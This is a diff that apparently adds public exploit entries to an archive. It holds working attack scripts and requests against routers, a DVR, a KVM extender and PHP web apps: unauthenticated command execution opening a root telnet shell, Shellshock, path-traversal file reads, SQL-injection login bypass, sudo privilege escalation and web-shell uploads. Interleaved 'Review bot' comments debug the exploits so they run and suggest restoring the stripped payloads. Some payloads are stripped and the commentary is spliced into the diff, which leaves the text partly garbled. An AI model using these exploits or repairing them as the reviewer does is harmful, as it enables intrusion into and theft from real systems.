diff --git a/exploits/hardware/webapps/50059.txt b/exploits/hardware/webapps/50059.txt deleted file mode 100644 index 7bf8bb178..000000000 --- a/exploits/hardware/webapps/50059.txt +++ /dev/null @@ -1,45 +0,0 @@ -# Title: Huawei dg8045 - Authentication Bypass -# Date: 2020-06-24 -# Author: Abdalrahman Gamal -# Vendor Homepage: www.huawei.com -# Version: dg8045 -# Hardware Version: VER.A - -#POC: - -The default password of this router is the last 8 characters of the -device's serial number which exist in the back of the device. - -An attacker can leak the serial number via the web app API like the -following: - -************************Request************************ -GET /api/system/deviceinfo HTTP/1.1 -Host: 192.168.1.1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) -Gecko/20100101 Firefox/65.0 -Accept: application/json, text/javascript, */*; q=0.01 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: https://192.168.1.1/ -X-Requested-With: XMLHttpRequest -Connection: close - - -************************Response************************ -HTTP/1.1 200 OK -Cache-Control: no-cache, no-store, max-age=0, must-revalidate -X-Download-Options: noopen -X-Frame-Options: SAMEORIGIN -X-XSS-Protection: 1; mode=block -Date: Thu, 24 Jun 2021 02:07 GMT+2 -Connection: Keep-Alive -Content-Language: en -Content-Type: application/javascript -Content-Length: 141 - -while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/ - - - -You can use that serial number last 8 char/digits to login to the router. \ No newline at end of file diff --git a/exploits/hardware/webapps/50099.py b/exploits/hardware/webapps/50099.py new file mode 100755 index 000000000..c90464472 --- /dev/null +++ b/exploits/hardware/webapps/50099.py 
@@ -0,0 +1,72 @@ +# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) +# Date: 02.07.2021 +# Exploit Author: SivertPL +# Vendor Homepage: https://www.netgear.com/ +# Version: All prior to v1.0.0.60 + +#!/usr/bin/python + +""" +NETGEAR DGN2200v1 Unauthenticated Remote Command Execution + +Author: SivertPL (kroppoloe@protonmail.ch) +Date: 02.07.2021 +Status: Patched in some models +Version: All prior to v1.0.0.60 +Impact: Critical + +CVE: No CVE number assigned +PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365 + + +References: + 1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ + 2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 + + +The exploit script only works on UNIX-based systems. + +This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past. +This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol. + +""" + +import sys +import requests +import os + +target_ip = "192.168.0.1" +telnet_port = 666 +sent = False + +def main(): + if len(sys.argv) < 3: + print "./dgn2200_pwn.py " + exit() + + target_ip = sys.argv[1] + telnet_port = int(sys.argv[2]) + print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..." + send_payload() + print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..." + print "[!] 
If it fails to connect it means the target is probably not vulnerable" + spawn_shell() + +def send_payload(): + try: + requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true") + sent = True + except Exception: + sent = False + print "[-] Unknown error, target might not be vulnerable." + +def spawn_shell(): + if sent: + print "[+] Dropping a shell..." + os.system("telnet " + target_ip + " " + telnet_port) + else: + exit() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/hardware/webapps/50100.py b/exploits/hardware/webapps/50100.py new file mode 100755 index 000000000..6bd145eed --- /dev/null +++ b/exploits/hardware/webapps/50100.py @@ -0,0 +1,23 @@ +# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion +# Date: 05.07.2021 +# Exploit Author: Ferhat Çil +# Vendor Homepage: http://www.blackbox.com/ +# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm +# Version: 3.4.31307 +# Category: Webapps +# Tested on: Linux +# Description: Any user can read files from the server +# without authentication due to an existing LFI in the following path: +# http://target//cgi-bin/show?page=FilePath + +import requests +import sys + +if name == 'main': + if len(sys.argv) == 3: + url = sys.argv[1] + payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2] + r = requests.get(payload) + print(r.text) + else: + print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd') \ No newline at end of file diff --git a/exploits/hardware/webapps/50104.txt b/exploits/hardware/webapps/50104.txt new file mode 100644 index 000000000..ca91046dc --- /dev/null +++ b/exploits/hardware/webapps/50104.txt 
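Review bot: `main()` assigns `target_ip` and `telnet_port` without a `global` statement, so they become locals and `send_payload()` still targets the hard-coded `192.168.0.1:666`; likewise `sent = True` inside `send_payload()` never reaches the module-level `sent`, so `spawn_shell()` always takes the `else: exit()` branch and a shell is never opened. The injected command also appends the port to the login binary (`-l /bin/sh666`), and `os.system("telnet " + target_ip + " " + telnet_port)` concatenates an int into a str, which raises `TypeError` on Python 2 as well. Declaring the globals, dropping the stray `str(telnet_port)` and stringifying the port in the `os.system` call fixes all three (fence below). Operators should also be told that the payload leaves an unauthenticated telnetd (typically running as root on such devices) listening for anyone on the LAN until it is killed or the router reboots, and that the `#!/usr/bin/python` shebang on line 8 is inert below the header comments.
```python
def main():
    global target_ip, telnet_port
    # … unchanged: argument-count check and usage message …
    target_ip = sys.argv[1]
    telnet_port = int(sys.argv[2])
    # … unchanged: banner prints, send_payload() and spawn_shell() calls …

def send_payload():
    global sent
    try:
        requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh&lookup=Lookup&ess_=true")
        sent = True
    # … unchanged: except branch …

def spawn_shell():
    if sent:
        print "[+] Dropping a shell..."
        os.system("telnet " + target_ip + " " + str(telnet_port))
    # … unchanged: else branch …
```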
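Review bot: The entry guard `if name == 'main':` references an undefined `name`, so the script dies with `NameError` before sending any request; it should read `if __name__ == '__main__':` (the underscores were presumably eaten when the file was pasted through a markdown renderer, so the rest of the file deserves the same check). With the documented usage (`http://example.com/ /etc/passwd`) the request becomes `//cgi-bin/show?page=../../../../../..//etc/passwd`; the doubled slashes are tolerated by most servers but should be normalised, e.g. `payload = url.rstrip("/") + "/cgi-bin/show?page=../../../../../../" + sys.argv[2].lstrip("/")`. What the PoC demonstrates is an unauthenticated arbitrary file read via path traversal; "Local File Inclusion" in the title overstates it unless `show` actually interprets the fetched file, which nothing here shows.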
@@ -0,0 +1,11 @@
+# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation
+# Date: 2021-07-05
+# Exploit Author: Andrea D'Ubaldo
+# Vendor Homepage: https://visual-tools.com/
+# Version: Visual Tools VX16 v4.2.28.0
+# Tested on: VX16 Embedded Linux 2.6.35.4.
+
+#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.
+
+sudo mount -o bind /bin/sh /bin/mount
+sudo mount
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50097.txt b/exploits/multiple/webapps/50097.txt
new file mode 100644
index 000000000..ce734c746
--- /dev/null
+++ b/exploits/multiple/webapps/50097.txt
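Review bot: The PoC bind-mounts `/bin/sh` over `/bin/mount`, which replaces the real `mount` for every process on the DVR until it is undone, so a cleanup step should follow the escalation: `exit` from the root shell, then `sudo umount /bin/mount`. The precondition is described only as "unsafe Sudo configuration"; record what was actually observed — presumably a `sudo -l` entry permitting `mount` as root without a password — as a comment such as `# Precondition: sudo -l lists (root) NOPASSWD: /bin/mount for the DVR's login user (confirm on device)`. The title says 4.2.28 while the header says v4.2.28.0; use one version string.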
@@ -0,0 +1,140 @@ +# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) +# Date: 05/07/2021 +# Exploit Author: Alhasan Abbas (exploit.msf) +# Vendor Homepage: https://www.perfexcrm.com/ +# Version: 1.10 +# Tested on: windows 10 + +Vunlerable page: /clients/profile + +POC: +---- +POST /clients/profile HTTP/1.1 + +Host: localhost + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058 + +Content-Length: 1548 + +Origin: http://localhost + +Connection: close + +Referer: http://localhost/clients/profile + +Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038 + +Upgrade-Insecure-Requests: 1 + + + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="profile" + + + +1 + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="profile_image"; filename="" + +Content-Type: application/octet-stream + + + + + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="firstname" + + + +adfgsg + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="lastname" + + + +fsdgfdg + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="company" + + + +test + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="vat" + + + +1 + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="phonenumber" + + + + + +-----------------------------325278703021926100783634528058 + +Content-Disposition: form-data; name="country" + + + +105 + 
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="city"
+
+
+
+asdf
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="address"
+
+
+
+asdf
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="zip"
+
+
+
+313
+
+-----------------------------325278703021926100783634528058
+
+Content-Disposition: form-data; name="state"
+
+
+
+"">">
+
+-----------------------------325278703021926100783634528058--
+
+then any one open profile page in user the xss its executed
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50098.txt b/exploits/multiple/webapps/50098.txt
new file mode 100644
index 000000000..99a79a3c2
--- /dev/null
+++ b/exploits/multiple/webapps/50098.txt
@@ -0,0 +1,10 @@
+# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
+# Date: 2021-07-05
+# Exploit Author: Andrea D'Ubaldo
+# Vendor Homepage: https://visual-tools.com/
+# Version: Visual Tools VX16 v4.2.28.0
+# Tested on: VX16 Embedded Linux 2.6.35.4.
+
+# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.
+
+curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py
\ No newline at end of file
diff --git a/exploits/php/webapps/50102.py b/exploits/php/webapps/50102.py
new file mode 100755
index 000000000..d4dd053f7
--- /dev/null
+++ b/exploits/php/webapps/50102.py
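Review bot: The `state` field carries only `"">">`, which is not an XSS payload by itself; the injected element (presumably a `<script>` or an `<img onerror=…>` tag) was stripped when the advisory was rendered as HTML, so the PoC as published cannot be reproduced and the payload should be restored verbatim. The request is sent with a valid `sp_session` cookie, so this is an authenticated stored XSS in the client portal; the title should carry `(Authenticated)` like the other entries in this commit. The closing sentence is hard to parse; suggest `The payload is stored and executes whenever a staff member or another user views this client's profile page.` The blank line after every header and a `Content-Length: 1548` that no longer matches the shown body are publication artifacts worth cleaning up too.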
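Review bot: The `curl` line carries leftovers from a generic one-liner: `bash -s :''` is handed to curl as extra URL arguments and `http:/DVR_ADDR` is missing a slash, so the command as written does not cleanly reach the DVR; it should be `curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' http://DVR_ADDR/cgi-bin/slogin/login.py`. The header value `() { :; }; …` is the CVE-2014-6271 (Shellshock) function-export pattern, which suggests the root cause is an unpatched bash invoked through the CGI environment rather than input handling in `login.py` itself; if that is confirmed the advisory should say so and name the CVE, since the fix is a bash update rather than a change to the script. A sample of the returned `/etc/passwd` lines would also substantiate the unauthenticated RCE claim.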
@@ -0,0 +1,68 @@ +# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 06.07.2021 +# Exploit Author: Talha DEMİRSOY +# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html +# Version: V 1.0 +# Tested on: Linux & Windows + +import requests +import random +import string +from bs4 import BeautifulSoup + +let = string.ascii_lowercase +shellname = ''.join(random.choice(let) for i in range(15)) +randstr = ''.join(random.choice(let) for i in range(15)) + +payload= "'; $cmd = +($_GET['cmd']); system($cmd); echo ''; die; } ?>" + +url = input("Target : ") + +session = requests.session() + +reqUrl = url + "login.php" +reqHead = {"Content-Type": "application/x-www-form-urlencoded"} +reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''} +session.post(reqUrl, headers=reqHead, data=reqData) + +print("Shell Uploading...") + +reqUrl = url + "php_action/createProduct.php" +reqHead = {"Content-Type": "multipart/form-data; +boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"} +reqData = +"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; name=\"productImage\"; +filename=\""+shellname+".php\"\r\nContent-Type: +application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; 
+name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: +form-data; +name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n" +session.post(reqUrl, headers=reqHead, data=reqData) + +print("product name is "+randstr) +print("shell name is "+shellname) + +reqUrl = url + "product.php" +data = session.get(reqUrl) + +parser = BeautifulSoup(data.text, 'html.parser') +find_shell = parser.find_all('img') + +for i in find_shell: + if shellname in i.get("src"): + print("Shell URL : " + url + i.get("src") + "?cmd=whoami") \ No newline at end of file diff --git a/exploits/php/webapps/50103.php b/exploits/php/webapps/50103.php new file mode 100644 index 000000000..dc485661b --- /dev/null +++ b/exploits/php/webapps/50103.php 
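Review bot: Several string literals are split across physical lines — `payload=` breaks after `$cmd =`, `reqHead` after `multipart/form-data;`, and `reqData` is wrapped roughly every 70 characters — so the file is not valid Python and fails with an unterminated-string `SyntaxError` before anything runs; re-join the lines, or build `reqData` from adjacent literals inside parentheses. The uploaded shell also lacks its PHP open tag: the trailing `}` and `?>` imply a head such as `<?php if(isset($_GET['cmd'])) {` that was apparently stripped on publication, and without `<?php` the uploaded file is served as plain text. `url + "login.php"` additionally assumes the supplied URL ends in `/`, which the `Target :` prompt does not say; `url.rstrip("/") + "/login.php"` (and the same for the other two paths) removes the trap, and a note that the script leaves a web shell on the target that must be deleted afterwards belongs in the header.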
@@ -0,0 +1,119 @@ +# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) +# Date: 06/07/2021 +# Exploit Author: Thamer Almohammadi (@Thamerz88) +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html +# Version: 1.0 +# Tested on: Kali Linux + +# Proof of Concept : + +1- Send Request to /pages/save_user.php. +2- Find your shell.php file path and try any command. + + +################################## REQUEST ############################### +POST /pages/save_user.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877 +Content-Length: 369 +-----------------------------3767690350396265302394702877 +Content-Disposition: form-data; name="image"; filename="shell.php" +Content-Type: application/x-php + +-----------------------------3767690350396265302394702877 + +Content-Disposition: form-data; name="btn_save" + +-----------------------------3767690350396265302394702877-- + + + + +################################## RESPONSE ############################# +HTTP/1.1 200 OK +Date: Tue, 06 Jul 2021 02:16:18 GMT +Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1 +X-Powered-By: PHP/7.3.28 +Content-Length: 1529 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + +################################## Exploit ############################# +File To Upload : ";}else{echo "Upload failed";}?>'; + $data = "-----------------------------3767690350396265302394702877\r\n"; + $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n"; + $data .= "Content-Type: 
image/gif\r\n\r\n"; + $data .= "$content\r\n"; + $data .= "-----------------------------3767690350396265302394702877\r\n"; + + $data .= "-----------------------------3767690350396265302394702877\r\n"; + $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n"; + $data .= "\r\n"; + $data .= "-----------------------------3767690350396265302394702877\r\n"; + + $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n"; + $packet .= "Host: $host\r\n"; + $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; + $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n"; + $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; + $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; + $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n"; + $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n"; + $packet .= $data; + $packet .= "\r\n"; + send($host, $packet); + sleep(2); + check($url,$shell); +} +function send($host, $packet) +{ + if ($connect = @fsockopen ($host, 80, $x, $y, 3)) + { + @fputs ($connect, $packet); + @fclose ($connect); + } + +} + +function check($url,$shell){ + $check=file_get_contents($url."/uploadImage/Profile/".$shell); + $preg=preg_match('/(File To Upload)/', $check, $output); + if($output[0] == "File To Upload"){ + echo "[+] Upload shell successfully.. :D\n"; + echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; + } + else{ //Exploit Failed + echo "[-] Exploit Failed..\n"; + } + + +} +$options=getopt("u:s:"); +if(!isset($options['u'], $options['s'])) +die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n +-u http://target.com = Target URL .. 
+-s shell.php = Shell Name ..\n\n"); +$url=$options["u"]; +$shell=$options["s"]; +$parse=parse_url($url); +$host=$parse['host']; +$path=$parse['path']; +$scheme=$parse['scheme']; +exploit($scheme,$host,$path,$shell); + +?> \ No newline at end of file diff --git a/exploits/php/webapps/50105.txt b/exploits/php/webapps/50105.txt new file mode 100644 index 000000000..2616c673d --- /dev/null +++ b/exploits/php/webapps/50105.txt @@ -0,0 +1,38 @@ +# Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) +# Date: 2021-07-06 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html +# Version: 1.0 +# Tested on: Windows 10, XAMPP + + +########### +# PoC # +########### + +Request: +======== + +POST /osms/Execute/ExLogin.php HTTP/1.1 +Host: localhost +Content-Length: 43 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/osms/index.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +Username=or+1%3D1%2F*&Password=or+1%3D1%2F* + + +Payload: +========= + +Username=or 1=1/* +Password=or 1=1/* \ No newline at end of file diff --git a/exploits/php/webapps/50106.txt b/exploits/php/webapps/50106.txt new file mode 100644 index 000000000..fa1e1266a --- /dev/null +++ b/exploits/php/webapps/50106.txt 
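Review bot: The multipart body assembled in `exploit()` never terminates: the final `$data .=` appends the boundary without the closing `--`, and the doubled boundary after the file part inserts an empty part, so success depends on the server's parser being lenient; end with `$data .= "-----------------------------3767690350396265302394702877--\r\n";` and drop the duplicate boundary line. `"Content-Length: ".strlen ($data)."\r\n\r\n\r\n"` emits a third CRLF that the server counts as body, and `send()` always calls `fsockopen($host, 80, …)` regardless of `$scheme`, so an `https://` target silently gets a plaintext connection to port 80; remove the extra `\r\n` and pass `$scheme` into `send()` to select `ssl://`/443. The file as published begins at `File To Upload : ";}else{echo "Upload failed";}?>';`, i.e. the `<?php` open tag and the head of `exploit()` holding the `$content` web-shell literal appear to have been stripped, so nothing runs until they are restored. `check()` also indexes `$output[0]` when `preg_match` matched nothing; test `if ($preg)` instead.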
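Review bot: The payload `or 1=1/*` contains no quote to close a string literal, so it only bypasses the login if `ExLogin.php` interpolates `Username`/`Password` into the query unquoted; if the payload that was actually tested was `' or 1=1/*`, the leading apostrophe has been lost in publication. Either way the PoC should quote the vulnerable query (or the relevant line of `ExLogin.php`) and include the successful response, since the request alone does not show that authentication was bypassed. Note also that `/*` relies on MySQL-style comment handling to discard the remainder of the query.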
@@ -0,0 +1,161 @@ +# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution +# Date: 2021-07-06 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html +# Version: 1.0 +# Tested on: Windows 10, XAMPP + + +########### +# PoC 1: # +########### + +Request: +======== + +POST /osms/Execute/ExAddProduct.php HTTP/1.1 +Host: localhost +Content-Length: 2160 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/osms/AddNewProduct.php +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 +Connection: close + +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ProductName" + +camera +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="BrandName" + +soskod +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ProductPrice" + +12 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Quantity" + +1 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="TotalPrice" + +12 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="DisplaySize" + +15 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="OperatingSystem" + +windows +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Processor" + 
+4 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="InternalMemory" + +4 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="RAM" + +4 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="CameraDescription" + +lens +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="BatteryLife" + +3300 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Weight" + +500 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Model" + +AIG34 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Dimension" + +5 inch +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ASIN" + +9867638 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="ProductImage"; filename="rev.php" +Content-Type: application/octet-stream + + +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="date2" + +2020-06-03 +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="Description" + +accept +------WebKitFormBoundaryIBZWMUliFtu0otJ0 +Content-Disposition: form-data; name="_wysihtml5_mode" + +1 +------WebKitFormBoundaryIBZWMUliFtu0otJ0-- + + + +########### +# PoC 2: # +########### + +Request: +======== + +POST /osms/Execute/ExChangePicture.php HTTP/1.1 +Host: localhost +Content-Length: 463 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://localhost/osms/UserProfile.php +Accept-Encoding: gzip, deflate 
+Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 +Connection: close + +------WebKitFormBoundary4Dm8cGBqGNansHqI +Content-Disposition: form-data; name="IDUser" + +6 +------WebKitFormBoundary4Dm8cGBqGNansHqI +Content-Disposition: form-data; name="Image"; filename="rev.php" +Content-Type: application/octet-stream + + +------WebKitFormBoundary4Dm8cGBqGNansHqI-- + + + +########### +# Access: # +########### + +# Webshell access via: +PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami +PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami + +# Output: +result: windows10\user \ No newline at end of file diff --git a/exploits/php/webapps/50107.py b/exploits/php/webapps/50107.py new file mode 100755 index 000000000..d285f0602 --- /dev/null +++ b/exploits/php/webapps/50107.py @@ -0,0 +1,11 @@ +# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal +# Date: 05.07.2021 +# Exploit Author: TheSmuggler +# Vendor Homepage: https://gotmls.net/ +# Software Link: https://gotmls.net/downloads/ +# Version: <= 4.20.72 +# Tested on: Windows + +import requests + +print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text) \ No newline at end of file diff --git a/exploits/python/webapps/50101.py b/exploits/python/webapps/50101.py new file mode 100755 index 000000000..15c188104 --- /dev/null +++ b/exploits/python/webapps/50101.py 
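Review bot: Both requests carry a `PHPSESSID` cookie, so the uploads require a logged-in session (or the SQLi login bypass filed alongside as 50105); the title should say `(Authenticated)` or point to the bypass, as the other entries in this commit distinguish the two. The `rev.php` file parts are empty in both PoCs — the shell body (presumably `<?php system($_GET['rev']); ?>`, given the `?rev=whoami` access URLs) was stripped on publication and should be restored so the PoC is reproducible. PoC 2 also submits an arbitrary `IDUser=6`, which may allow overwriting another user's picture; worth confirming and noting as a separate access-control issue.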
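Review bot: The request uses `action=duplicator_download&file=`, which matches the Duplicator plugin's file-download AJAX endpoint rather than anything in the Anti-Malware Security and Bruteforce Firewall (gotmls) plugin named in the title and vendor fields; the affected component should be verified before this entry is relied on. The title's version 4.20.59 also contradicts the header's `# Version: <= 4.20.72`. The traversal path is written in a normal string literal, so `\W`, `\w` and `\.` survive only because Python leaves unknown escapes alone (a `SyntaxWarning` from 3.12); use a raw string and take the target from the command line instead of hard-coding `127.0.0.1`: `print(requests.get(sys.argv[1].rstrip("/") + r"/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent": "Chrome"}).text)` with `import sys` added.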
